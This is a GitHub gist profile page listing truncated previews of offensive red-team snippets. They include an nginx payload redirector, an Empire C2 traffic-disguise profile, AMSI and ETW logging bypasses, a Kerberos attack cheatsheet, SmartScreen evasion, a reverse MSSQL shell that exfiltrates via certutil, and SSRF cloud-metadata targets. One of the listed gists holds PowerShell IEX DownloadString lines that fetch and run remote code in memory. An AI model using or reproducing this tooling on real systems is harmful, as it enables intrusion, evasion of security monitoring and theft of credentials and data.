Skip to content

Instantly share code, notes, and snippets.

View CalfCrusher's full-sized avatar

Christopher CalfCrusher

View GitHub Profile
CalfCrusher / nginx_example_vhost
Created November 12, 2023 10:05
Nginx as redirector for payloads
limit_req_zone $binary_remote_addr zone=req_zone:10m rate=5r/m;
server {
root /var/www/;
index index.html;
location / {
try_files $uri $uri/ =404;
location = /bypassamsiandrequeststager.txt {
CalfCrusher / custom_amazon_empire_malleable.profile
Last active December 12, 2023 10:37
Amazon Empire C2 Custom Malleable profile
# Modified Amazon browsing traffic profile
set sleeptime "10000"; # Increased sleep time to 10 seconds
set jitter "500"; # Increased jitter to 500 milliseconds
set maxdns "255";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"; # Changed the User Agent
http-get {
CalfCrusher / SimulateInternetZoneTest.ps1
Created November 7, 2023 00:18 — forked from mgraeber-rc/SimulateInternetZoneTest.ps1
Example highlighting why attackers likely choose ISO/IMG as a delivery mechanism - it evades SmartScreen because Mark-of-the-Web (MOTW) cannot be applied to non NTFS volumes
Add-Type -OutputAssembly hello.exe -TypeDefinition @'
using System;
public class Hello {
public static void Main(string[] Args) {
System.Console.WriteLine("Hello, world!");
CalfCrusher /
Created October 15, 2023 10:57 — forked from TarlogicSecurity/
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet



python -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

CalfCrusher / KillETW.ps1
Created October 7, 2023 15:52 — forked from tandasat/KillETW.ps1
Disable ETW of the current PowerShell session
# This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled
# which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt
# to bypass Suspicious ScriptBlock Logging for readability.
CalfCrusher /
Created October 7, 2023 15:07 — forked from D3Ext/
All methods to bypass AMSI (2022)

AMSI Bypass

To perform all this techniques you can simply try them by typing "Invoke-Mimikatz" into your powershell terminal, you'll notice that even if you haven't imported Mimikatz it will detect that as malicious. But if the AMSI is off or you avoid it, it just will say that "it's not recognized as the name of a cmdlet", so you could say that you've bypassed the AMSI

However some methods may be detected by the AV but most of them actually work without problem

Powershell downgrade

The first and worst way to bypass AMSI is downgrading powershell version to 2.0.

# Function to XOR a string with a key
xor_string() {
local string=$1
local key=$2
local result=""
for ((i = 0; i < ${#string}; i++)); do
local char=${string:i:1}
CalfCrusher / In-memory PS injection.txt
Created May 30, 2023 17:53 — forked from chr0n1k/In-memory PS injection.txt
Some in-memory Powershell injection scripts
#IEX (New-Object Net.WebClient).DownloadString('');
#IEX (New-Object Net.WebClient).DownloadString('')
#"IEX (New-Object Net.WebClient).DownloadString('')
#IEX (New-Object Net.WebClient).DownloadString(''); Get-VaultCredential
#IEX (New-Object Net.WebClient).DownloadString('')
CalfCrusher /
Created May 19, 2023 15:03 — forked from xassiz/
Reverse MSSQL shell
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
CalfCrusher / cloud_metadata.txt
Created May 11, 2023 16:15 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
## AWS
# Amazon Web Services (No Header Required)
# from[ROLE NAME]